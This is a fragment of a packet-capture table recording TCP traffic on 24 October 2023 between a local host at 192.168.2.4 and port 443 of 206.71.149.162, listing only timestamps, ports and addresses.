| Oct 24, 2023 06:55:22.564852953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564863920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564905882 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564908028 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564918995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.564956903 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.564965010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565011978 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565012932 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565021992 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565054893 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565069914 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565110922 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565119982 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565128088 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565154076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565155983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565171003 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565176010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565217018 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565217018 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565242052 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565247059 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565272093 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565273046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565296888 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565301895 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565325975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565340042 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565351009 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565356016 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565376997 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565377951 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565401077 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565407038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565428019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565432072 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565454960 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565459967 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565483093 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565486908 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565509081 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565515041 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565532923 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565536022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565578938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565581083 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565589905 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565593004 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565623999 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565634012 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565642118 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565687895 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565689087 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565697908 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565735102 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565742970 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565788031 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565799952 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565846920 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565846920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565859079 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565895081 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565902948 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565912008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565947056 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.565957069 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.565999031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566009998 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566015959 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566040039 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566047907 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566059113 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566065073 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566080093 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566106081 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566108942 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566116095 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566155910 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566167116 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566215038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566215992 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566224098 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566257954 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566270113 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566304922 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566317081 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566323042 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566335917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566349983 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566359043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566361904 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566395044 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566401958 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566418886 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566427946 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566452980 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566457987 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.566476107 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.566507101 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.568476915 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.568484068 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.568505049 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.568510056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.568536043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.568592072 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.568595886 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.568608999 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.568653107 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.568696022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.572523117 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.576378107 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.667256117 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.667340994 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.668183088 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.668248892 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.671449900 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.671513081 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.673760891 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.673825979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.674516916 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.674576998 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.675223112 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.675282001 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.676377058 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.676440001 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.676791906 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.676851988 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.677495956 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.677556992 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.679044962 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.679107904 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.679992914 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.680053949 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.680948019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.681009054 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.682945013 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.683007956 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.683377028 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.683434963 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.685023069 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.685084105 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.685384035 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.685444117 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.686861992 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.686922073 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.688317060 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.688379049 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.688659906 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.688719988 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.689146996 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.689205885 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.692533016 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.692600012 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.692954063 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.693012953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.693562031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.693623066 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.693847895 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.693903923 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.694283009 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.694338083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.694700956 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.694758892 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.696075916 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.696141005 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.696352005 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.696408987 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.696693897 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.696752071 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.697494030 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.697556019 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.697813988 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.697870970 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.698570967 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.698641062 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.698887110 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.698942900 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.700195074 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.700253963 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.700661898 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.700721979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.701874971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.701934099 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.702162027 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.702217102 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.702569008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.702634096 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.702945948 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.703000069 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.703439951 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.703496933 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.724582911 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.724664927 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.724966049 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.725018024 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.725383997 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.725441933 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.725805998 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.725867033 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.726210117 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.726270914 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.726516008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.726573944 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.727109909 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.727168083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.727404118 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.727462053 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.727746010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.727802038 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.728310108 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.728367090 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.728704929 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.728761911 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.729136944 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.729199886 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.730562925 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.730623960 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.731051922 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.731154919 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.731584072 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.731641054 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.732058048 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.732119083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.732413054 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.732469082 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.732870102 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.732924938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.733757019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.733818054 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.742326021 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.742398977 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.742893934 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.742954969 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.743379116 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.743438959 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.744062901 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.744117022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.744468927 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.744523048 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.744836092 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.744889975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.745102882 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.745160103 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.745558977 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.745616913 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.745852947 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.745908022 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.746222973 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.746285915 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.746617079 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.746679068 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.747179031 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.747236967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.747579098 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.747704029 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.747988939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.748045921 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.748606920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.748673916 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.748924971 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.748980999 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.749362946 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.749427080 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.749809027 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.749865055 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.750153065 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.750211954 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.750446081 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.750507116 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.750788927 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.750844955 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
